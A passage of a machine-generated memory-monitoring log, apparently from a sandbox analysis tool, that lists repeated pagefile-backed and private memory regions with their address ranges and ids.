Region: id = 11901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11911 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11912 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11916 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11917 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11918 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11953 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11954 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11958 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11959 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11960 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11961 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11962 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11963 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11964 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11965 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11966 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11967 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11968 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11969 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11970 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11971 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11972 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11973 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11974 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11975 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11976 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11977 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11978 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11979 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11980 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11984 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11985 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11986 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11987 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11989 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11990 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11994 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12035 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12036 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12037 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12038 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12039 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12087 start_va = 0x610000 end_va = 0x61efff 